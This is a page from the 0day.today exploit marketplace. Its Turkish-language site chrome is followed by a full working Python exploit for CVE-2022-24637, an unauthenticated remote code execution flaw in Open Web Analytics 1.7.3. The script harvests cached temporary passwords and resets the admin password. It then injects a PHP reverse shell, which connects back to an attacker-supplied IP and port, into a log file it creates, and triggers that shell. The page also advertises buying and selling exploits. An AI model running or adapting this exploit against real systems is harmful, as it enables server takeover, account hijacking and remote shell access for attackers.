0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Open Web Analytics 1.7.3 - Remote Code Execution Exploit
Yazar
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Kategori
Eklenme Tarihi
CVE
Platform
# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE) # Exploit Author: Jacob Ebben # Vendor Homepage: https://www.openwebanalytics.com/ # Software Link: https://github.com/Open-Web-Analytics # Version: <1.7.4 # Tested on: Linux # CVE : CVE-2022-24637 import argparse import requests import base64 import re import random import string import hashlib from termcolor import colored def print_message(message, type): if type == 'SUCCESS': print('[' + colored('SUCCESS', 'green') + '] ' + message) elif type == 'INFO': print('[' + colored('INFO', 'blue') + '] ' + message) elif type == 'WARNING': print('[' + colored('WARNING', 'yellow') + '] ' + message) elif type == 'ALERT': print('[' + colored('ALERT', 'yellow') + '] ' + message) elif type == 'ERROR': print('[' + colored('ERROR', 'red') + '] ' + message) def get_normalized_url(url): if url[-1] != '/': url += '/' if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://': url = "http://" + url return url def get_proxy_protocol(url): if url[0:8].lower() == 'https://': return 'https' return 'http' def get_random_string(length): chars = string.ascii_letters + string.digits return ''.join(random.choice(chars) for i in range(length)) def get_cache_content(cache_raw): regex_cache_base64 = r'\*(\w*)\*' regex_result = re.search(regex_cache_base64, cache_raw) if not regex_result: print_message('The provided URL does not appear to be vulnerable ...', "ERROR") exit() else: cache_base64 = regex_result.group(1) return base64.b64decode(cache_base64).decode("ascii") def get_cache_username(cache): regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"' return re.search(regex_cache_username, cache).group(1) def get_cache_temppass(cache): regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"' return re.search(regex_cache_temppass, cache).group(1) def get_update_nonce(url): try: update_nonce_request = session.get(url, proxies=proxies) regex_update_nonce = r'owa_nonce" value="(\w*)"' update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: return update_nonce parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)') parser.add_argument('TARGET', type=str, help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)') parser.add_argument('ATTACKER_IP', type=str, help='Address for reverse shell listener on attacking machine') parser.add_argument('ATTACKER_PORT', type=str, help='Port for reverse shell listener on attacking machine') parser.add_argument('-u', '--username', default="admin", type=str, help='The username to exploit (Default: admin)') parser.add_argument('-p','--password', default=get_random_string(32), type=str, help='The new password for the exploited user') parser.add_argument('-P','--proxy', type=str, help='HTTP proxy address (Example: http://127.0.0.1:8080/)') parser.add_argument('-c', '--check', action='store_true', help='Check vulnerability without exploitation') args = parser.parse_args() base_url = get_normalized_url(args.TARGET) login_url = base_url + "index.php?owa_do=base.loginForm" password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry" update_config_url = base_url + "index.php?owa_do=base.optionsGeneral" username = args.username new_password = args.password reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>' shell_filename = get_random_string(8) + '.php' shell_url = base_url + 'owa-data/caches/' + shell_filename if args.proxy: proxy_url = get_normalized_url(args.proxy) proxy_protocol = get_proxy_protocol(proxy_url) proxies = { proxy_protocol: proxy_url } else: proxies = {} session = requests.Session() try: mainpage_request = session.get(base_url, proxies=proxies) except Exception as e: print_message('Could not connect to "' + base_url, "ERROR") exit() else: print_message('Connected to "' + base_url + '" successfully!', "SUCCESS") if 'Open Web Analytics' not in mainpage_request.text: print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING") elif 'version=1.7.3' not in mainpage_request.text: print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING") else: print_message('The webserver indicates a vulnerable version!', "ALERT") try: data = { "owa_user_id": username, "owa_password": username, "owa_action": "base.login" } session.post(login_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred during the login attempt!', "ERROR") print(e) exit() else: print_message('Attempting to generate cache for "' + username + '" user', "INFO") print_message('Attempting to find cache of "' + username + '" user', "INFO") found = False for key in range(100): user_id = 'user_id' + str(key) userid_hash = hashlib.md5(user_id.encode()).hexdigest() filename = userid_hash + '.php' cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename cache_request = requests.get(cache_url, proxies=proxies) if cache_request.status_code != 200: continue; cache_raw = cache_request.text cache = get_cache_content(cache_raw) cache_username = get_cache_username(cache) if cache_username != username: print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO") continue; else: found = True break if not found: print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR") exit() cache_temppass = get_cache_temppass(cache) print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO") if args.check: print_message('The system appears to be vulnerable!', "ALERT") exit() try: data = { "owa_password": new_password, "owa_password2": new_password, "owa_k": cache_temppass, "owa_action": "base.usersChangePassword" } session.post(password_reset_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when changing the user password!', "ERROR") print(e) exit() else: print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO") try: data = { "owa_user_id": username, "owa_password": new_password, "owa_action": "base.login" } session.post(login_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred during the login attempt!', "ERROR") print(e) exit() else: print_message('Logged in as "' + username + '" user', "SUCCESS") nonce = get_update_nonce(update_config_url) try: log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[base.error_log_file]": log_location, "owa_config[base.error_log_level]": 2 } session.post(update_config_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: print_message('Creating log file', "INFO") nonce = get_update_nonce(update_config_url) try: data = { "owa_nonce": nonce, "owa_action": "base.optionsUpdate", "owa_config[shell]": reverse_shell } session.post(update_config_url, data=data, proxies=proxies) except Exception as e: print_message('An error occurred when attempting to update config!', "ERROR") print(e) exit() else: print_message('Wrote payload to log file', "INFO") try: session.get(shell_url, proxies=proxies) except Exception as e: print(e) else: print_message('Triggering payload! Check your listener!', "SUCCESS") print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO") # 0day.today [2024-07-02] #